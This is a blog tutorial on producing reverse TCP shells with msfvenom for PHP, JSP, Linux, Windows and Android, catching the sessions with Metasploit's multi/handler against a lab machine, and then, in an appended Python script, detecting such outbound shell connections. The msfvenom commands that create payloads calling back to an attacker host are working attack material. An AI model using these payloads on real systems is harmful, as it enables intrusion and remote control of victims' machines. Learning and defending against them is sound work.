Jul 03, 2020

Reverse TCP shell with Metasploit

Metasploit is an awesome tool. It can be used to automate the exploitation process, generate shellcode, act as a listener, etc. I hope to start a tutorial series on the Metasploit framework and its partner programs. So in today's tutorial, we are going to see how we can build a reverse TCP shell with Metasploit. As an example, we use msfvenom to create a web shell in PHP and use Metasploit to catch the session. The shell creates a reverse TCP connection back to our machine.

Reverse TCP vs Bind TCP shell

First of all, let's clarify what a reverse TCP shell is, what a bind shell is and how they work. In both situations there is an attacker machine and a victim server. In a reverse shell, the connection is opened from the victim server to the attacker's machine. We set up a listener on the attacker's machine that waits for an incoming connection from the victim. When the TCP connection arrives, it serves as a shell to access the victim server.

A bind shell works the other way around. The payload binds a shell to a specific port on the victim server, and the attacker then connects from his machine to that port on the victim server.

Generating the exploit using Msfvenom

First, we use msfvenom to create our shell. This tool is packaged with the Metasploit framework and can be used to generate exploits for multiple platforms such as Android, Windows, PHP servers, etc.

Following is the syntax for generating an exploit with msfvenom.

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555

Here we have supplied several arguments to the msfvenom tool. Let's see what they do. For now we don't use any encoding; we can look at encoders later.

Here -p stands for payload. It tells msfvenom which payload we want to use. Here we used meterpreter as the payload. You can get the list of available payloads with the command msfvenom --list payloads. In the above example we used a PHP payload since we are going to build a web shell.

-o sets the output file. We have specified shell.php, so our output will be saved as shell.php.

In the following list we can see some payload types we use often.

Web servers

Most web servers run PHP as their server-side language. We can build a PHP web shell with msfvenom by using "php/meterpreter_reverse_tcp" as the payload. Since we are uploading it to a PHP server, the extension of the shell should be ".php".

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555

What about a JSP server? We can build a web shell as a JSP file and try to upload it. So we use "java/jsp_shell_reverse_tcp" as our payload, and the output file extension should be ".jsp".

msfvenom -p java/jsp_shell_reverse_tcp -o shell.jsp LHOST= LPORT=555

Linux platforms

If we want to attack a Linux server we can use "linux/x86/meterpreter/reverse_tcp" as our payload, and ".elf" as the output file extension.

msfvenom -p linux/x86/meterpreter/reverse_tcp -o shell.elf LHOST= LPORT=555

Windows machines

For Windows, we can use meterpreter as the payload, so we select "windows/meterpreter/reverse_tcp". As you know, the extension should be ".exe".

msfvenom -p windows/meterpreter/reverse_tcp -o shell.exe LHOST= LPORT=555

Android devices

We know that Android is the world's most popular mobile operating system. Metasploit has various payloads for Android. Commonly we use "android/meterpreter_reverse_tcp" to attack Android devices. The output file type should be ".apk".

msfvenom -p android/meterpreter_reverse_tcp -o shell.apk LHOST= LPORT=555

LHOST is the IP of the attacker machine. It should be our public IP, because a reverse shell connects from the victim machine to our machine.

LPORT is any open port on our machine that the listener can bind.

You can see we have generated our shell as a PHP file. Now we can use any method like RFI, FUV etc. to upload this to a server. I'll use the Web for Pentester vulnerable machine. Before we execute our shell we need to set up a listener to catch our connection.

Now we start the Metasploit framework. There are several ways to use Metasploit, like msfcli, the msfweb interface, Armitage, msfconsole, etc. Most of the time we use msfconsole for this.

Yes, a beautiful interface. This is an interactive shell and we can use it easily. First, we want to set a handler for our connection. The handler is responsible for handling reverse connections. Here we use multi/handler. You can select it with the command use exploit/multi/handler.

Now we have to set some extra options. At any time in msfconsole you can find which options you need to set by entering the command show options.

In the output of show options, we can see we need to set LHOST and LPORT. Let's set them. Both of them are the same as what we used when generating our shell.

OK, now it is time to attack. We use the command run to start the handler.

It is waiting for an incoming connection. Now we can execute our shell on the web server.

Yes, it worked. We got our meterpreter shell. Now we can do many things. I'll post another tutorial on meterpreter. Till then you can see what to do with the command help. :-)
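Everything set up above ends in one thing that is visible on the victim: the web server process opens an outbound TCP connection to LHOST:LPORT (port 555 in this tutorial), which is exactly what separates a reverse shell from a bind shell that only listens. As an added example (not code from the original post or from Metasploit), here is a small checker over constructed `ss -tnp` style output that flags such sessions; the process names, allowlisted ports and addresses are assumptions for the example.

```python
"""Flag reverse-shell-style outbound connections in `ss -tnp` output.

Added example, not part of the original tutorial. A reverse shell makes the
web server process the CLIENT of a TCP connection from a high local port to
LHOST:LPORT; normal traffic has the server side on port 80/443 or goes to a
known backend. A bind shell would instead show up as a new LISTEN socket.
"""
import re
from ipaddress import ip_address

# Assumed process names of web-serving processes on this host.
WEB_PROCESSES = {"php-fpm", "apache2", "httpd", "nginx", "java", "tomcat"}
# Ports the web server legitimately serves on (inbound sessions, not flagged).
LOCAL_SERVICE_PORTS = {80, 443, 8080, 8443}
# Constructed allowlist of backends a web app may connect out to; tune per host.
ALLOWED_PEER_PORTS = {3306, 5432, 6379, 11211}

SS_LINE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+"
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)

def split_addr(addr):
    """'10.0.0.5:555' -> ('10.0.0.5', 555); also handles '[::1]:555'."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), int(port)

def flag_reverse_shells(ss_output):
    """Return (proc, pid, peer_host, peer_port) for suspicious outbound sessions."""
    findings = []
    for line in ss_output.splitlines():
        m = SS_LINE.match(line.strip())
        if not m or m["state"] != "ESTAB" or m["proc"] not in WEB_PROCESSES:
            continue
        _, local_port = split_addr(m["local"])
        peer_host, peer_port = split_addr(m["peer"])
        if local_port in LOCAL_SERVICE_PORTS:      # we are the server: normal
            continue
        if peer_port in ALLOWED_PEER_PORTS or ip_address(peer_host).is_loopback:
            continue                                # known backend or local IPC
        findings.append((m["proc"], int(m["pid"]), peer_host, peer_port))
    return findings

# Constructed sample output; 198.51.100.23:555 stands in for the attacker's LHOST:LPORT.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
ESTAB  0      0      10.0.0.5:80          203.0.113.9:51234  users:(("apache2",pid=1203,fd=12))
ESTAB  0      0      10.0.0.5:41876       198.51.100.23:555  users:(("php-fpm",pid=1311,fd=5))
ESTAB  0      0      10.0.0.5:39212       10.0.0.20:3306     users:(("php-fpm",pid=1311,fd=6))
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=800,fd=3))
"""

if __name__ == "__main__":
    for hit in flag_reverse_shells(SAMPLE_SS):
        print("suspicious outbound connection:", hit)
```

Only the php-fpm session to 198.51.100.23:555 is reported; the inbound HTTP client and the MySQL backend connection are ignored.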
